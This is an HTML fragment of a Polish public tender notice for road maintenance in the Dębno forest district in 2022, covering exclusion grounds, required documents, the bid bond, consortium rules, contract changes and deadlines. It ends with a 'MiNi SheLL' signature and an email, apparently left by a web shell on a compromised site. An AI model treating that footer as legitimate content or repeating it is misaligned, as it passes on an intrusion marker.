wymieniona w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została<br/>wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3<br/>Specustawy; j) art. 7 ust. 1 pkt 3 Specustawy Zamawiający wykluczy Wykonawcę, którego jednostką dominującą w rozumieniu art. 3<br/>ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w<br/>wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 Specustawy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu,Zamawiający przed udzieleniem zamówienia, działając na podstawie<br/>art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych<br/>środków dowodowych:a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały<br/>wykonane (wzór wykazu wykonanych robót budowlanych stanowi załącznik nr 7 do SWZ). Jeżeli Wykonawca powołuje się na<br/>doświadczenie w realizacji robót budowlanych wykonanych wspólnie z innymi wykonawcami wykaz, o którym mowa wyżej dotyczy<br/>robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył. Okres wyrażony w latach, o którym mowa<br/>wyżej, liczy się wstecz od dnia w którym upływa termin składnia ofert; b) dowodów określających, że wskazane przez Wykonawcę<br/>roboty budowlane na potwierdzenie spełnienia warunku udziału w postępowaniu dot. zdolności technicznej lub zawodowej w<br/>zakresie doświadczenia zostały wykonane należycie. Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz<br/>które go roboty budowlane były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty. Jeżeli Zamawiający jest podmiotem, na rzecz którego wykonywane były roboty<br/>budowlane, Wykonawca nie ma obowiązku<br/>przedkładać w/wdowodów; c) wykazu urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego<br/>wraz z informacją o podstawie do dysponowania tymi zasobami (wzór wykazu urządzeń technicznych dostępnych Wykonawcy w<br/>celu wykonania zamówienia stanowi<br/>załącznik nr 8 do SWZ);d) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami<br/>na temat ich kwalifikacji zawodowych, posiadanych uprawnień (jeżeli<br/>są wymagane), doświadczenia (jeżeli jest wymagane) niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór wykazu osób skierowanych<br/>przez wykonawcę do realizacji<br/>zamówienia stanowi załącznik nr 10 do SWZ),</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawców przedłożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości 5 000 zł (słownie: pięć tysięcy 00/100 złotych). Wadium należy<br/>wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z<br/>wyjątkiem przypadków, o którychmowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP. Wadium może być wnoszone w jednej lub kilku następujących formach:1)<br/>pieniądzu,2) gwarancjach bankowych,3) gwarancjach ubezpieczeniowych,4) poręczeniach udzielonych przez podmioty, o<br/>których mowa w art. 6b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji<br/>RozwojuPrzedsiębiorczości (tekst jedn.: Dz. U. z 2020 r. poz. 299). Wadium wnoszone w pieniądzu należy wpłacić<br/>przelewem na rachunek bankowy Zamawiającego w banku PKO<br/>BPO/Dębno, nr rachunku: 02 1020 1954 0000 7402 0048 1580 z dopiskiem: „Utrzymanie dróg na terenie Nadleśnictwa<br/>Dębno w 2022 r. - II postępowanie , bądź podaniem sygnatury postępowania SA.270.2.3.2022.Wniesienie wadium w pieniądzu będzie<br/>skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego. Wadium wniesione w<br/>pieniądzu Zamawiający przechowuje na rachunku bankowym. Z treści wadium wnoszonego w formie: gwarancji bankowej,<br/>gwarancji ubezpieczeniowej lub poręczeniach<br/>udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej<br/>Agencji Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez<br/>Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w<br/>pkt 11.2. ppkt 2)- 4) należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj.opatrzonej<br/>kwalifikowanym podpisem elektronicznym, osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę<br/>przez cały okres związania ofertą. Treść gwarancji wadialnej musi zawierać następujące elementy: 1)nazwę dającego<br/>zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji<br/>ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib, 2) określenie wierzytelności, która ma<br/>być zabezpieczona gwarancją/poręczeniem – określenie przedmiotu zamówienia 3) kwotę<br/>gwarancji/poręczenia, 4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty<br/>gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6<br/>PZP.Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. Oferta Wykonawcy, który nie wniósł<br/>wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą<br/>lub złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 zostanie odrzucona na podstawie art.<br/>226 ust. 1 pkt Pełen i szczegółowy opis w SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia(konsorcjum): 1) w formularzu Oferty (wg. wzoru stanowiącego załącznik nr 2 SWZ) należy wskazać firmy<br/>(nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;2) oferta musi być podpisana w taki<br/>sposób, by wiązała prawnie wszystkich W-ców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca<br/>ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa<br/>załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;3) Oświadczenia, o których<br/>mowa w art. 125 ust. 1 PZP, tj. oświadczenie o spełnieniu warunków udziału w postępowaniu (wg wzoru stanowiącego<br/>załącznik nr 3A do SWZ)oraz oświadczenie o braku podstaw do wykluczenia (wg wzoru stanowiącego załącznik nr 3B do<br/>SWZ) składa każdy z wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw do wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Oświadczenia wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia, o których mowa wyżej powinny zostać złożone wraz z ofertą pod rygorem nieważności, w<br/>formie<br/>elektronicznej lub wpostaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.4) dokumenty, o których<br/>mowa w pkt 9.3.obowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się o udzieleniezamówienia5)<br/>wszyscy W-cy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie<br/>umowy;6) W-cy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę<br/>kierującego(lidera),upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu<br/>każdego, jak też dla wszystkich partnerów;7) Z-cy może w<br/>ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.8)Zamawiający informuje o treści przepisu<br/>art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. W związku z powyższym<br/>W-ca jest zobowiązany załączyć do oferty podmiotowy środek dowodowy w postaci oświadczenia, z którego wynika, które<br/>roboty budowlane wykonają poszczególni W-cy. Wzór stosownego oświadczenia został zawarty w formularzu Oferty<br/>stanowiącym załącznik nr 2 do SWZ i Z-cy zaleca złożyć to oświadczenie<br/>właśnie na tym formularzu,oświadczenie, o którym mowa w art. 117 ust. 4 PZP – z którego wynika, które roboty budowlane<br/>wykonają poszczególni Wykonawcy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia. (Z-cy<br/>zaleca złożenie tego oświadczenia w<br/>treści formularza Oferty stanowiącego załącznik nr 2 do SWZ). Pełen i szczegółowy opis w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na<br/>podstawie której dokonano wyboru Wykonawcy, w przypadkach określonych w art. 455 ustawy PZP oraz zaistnienia<br/>następujących przesłanek:<br/>1) zmiana wysokości wynagrodzenia Wykonawcy w przypadku zmiany przepisów prawa podatkowego, w szczególności<br/>zmiany stawki podatku od towarów i usług, poprzez zwiększenie lub zmniejszenie wynagrodzenia wykonawcy stosownie do<br/>zmiany stawki podatku;<br/>2) zmiana terminu wykonania Przedmiotu Umowy możliwa jest w następujących przypadkach: a) wystąpienia działań i<br/>zaniechań organów władzy publicznej, w tym zmiany przepisów<br/>i urzędowych interpretacji przepisów dot. realizacji i finansowania Przedmiotu Umowy, przekroczenie terminów na wydanie<br/>odpowiednich decyzji, zezwoleń, uzgodnień, b) przedłużenia się procedury udzielenia przedmiotowego zamówienia<br/>publicznego; c) wystąpienia działań i zaniechań instytucji zaangażowanych w realizację, kontrolę lub finansowanie<br/>zamówienia, d) wystąpienia zdarzeń o charakterze nadzwyczajnym, występujących po zawarciu Umowy, a których Strony<br/>nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie Umowy<br/>zgodnie z jej treścią,<br/>w szczególności działania siły wyższej, przez którą rozumie się m.in. powódź, deszcz nawalny, pożar. Strona powołująca<br/>się na powyższe zdarzenia jest zobowiązana do niezwłocznego pisemnego powiadomienia drugiej Strony, a następnie do<br/>udokumentowania zaistnienia tego zdarzenia, e) wystąpienia warunków atmosferycznych i klimatycznych<br/>uniemożliwiających realizację Przedmiotu Umowy w stopniu większym niż można byłoby to racjonalnie przewidywać,<br/>f)wystąpienia powszechnej niedostępności surowców bądź materiałów, g)konieczności uwzględnienia wpływu ewentualnych<br/>zamówień, o których mowa w art. 214 ust. 1 pkt 7) PZP na realizację Przedmiotu Umowy; h) wstrzymania robót lub przerw w<br/>pracach powstałych z przyczyn leżących po stronie Zamawiającego; i)w okolicznościach, wskazanych w pkt 3) poniżej.<br/>3) zmiana zakresu i sposobu wykonania Przedmiotu Umowy lub wynagrodzenia możliwa jest<br/>w następujących przypadkach: a)wystąpienia konieczności realizowania Przedmiotu Umowy w inny sposób niż<br/>zastosowany, ze względu na zmianę obowiązującego prawa, b)rozszerzenia lub ograniczenia zakresu robót,<br/>spowodowanego uwarunkowaniami techniczno-eksploatacyjnymi, geotechnicznymi, geologicznymi lub hydrologicznymi<br/>c)zastosowania nowych lub innych technologii, jeżeli zmiana jest korzystna z punktu widzenia realizacji Przedmiotu Umowy,<br/>w szczególności przyspieszających realizację, obniżających koszty ponoszone przez Zamawiającego na wykonanie,<br/>utrzymanie lub użytkowanie Przedmiotu Umowy bądź zwiększających użyteczność Przedmiotu Umowy,<br/>4) powierzenia części zamówienia do wykonania podwykonawcom w zakresie nieprzewidzianym do podwykonania w treści<br/>oferty Wykonawcy – w przypadku uzasadnionego wniosku zgłoszonego przez Wykonawcę.<br/>2. Każda zmiana i uzupełnienie umowy, będzie wymagać aneksu w formie pisemnej pod rygorem nieważności, za wyjątkiem<br/>zmian upoważnionych przedstawicieli stron.<br/>3. W przypadku wystąpienia okoliczności, o których mowa w ust.1 pkt 2 lit. a)÷i) termin wykonania umowy może ulec<br/>odpowiedniemu przedłużeniu, jednakże o czas nie dłuższy niż okres trwania tych okoliczności lub czas niezbędny do<br/>usunięcia zaistniałych przeszkód.<br/>4. W przypadku wystąpienia okoliczności wskazanych w ust. 1 pkt 3) zmiana wysokości wynagrodzenia będzie polegała na<br/>jego zwiększeniu albo zmniejszeniu odpowiednio do zwiększonego albo zmniejszonego zakresu robót i zostanie ustalona w<br/>drodze negocjacji m.in. w oparciu o kosztorys inwestorski.<br/>5. Wszelkie zmiany wprowadzane do Umowy dokonywane będą z poszanowaniem obowiązków wynikających z<br/>obowiązującego prawa, w tym w szczególności art. 455 PZP oraz zasad ogólnych rządzących tą ustawą. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-05 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem platformy SMARTPZP https://portal.smartpzp.pl/nadl.debno</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-05 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-05</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pełen i szczegółowy opis warunków zamówienia w SWZ dostępny na stronie<br/>https://portal.smartpzp.pl/nadl.debno

Creat By MiNi SheLL
Email: jattceo@gmail.com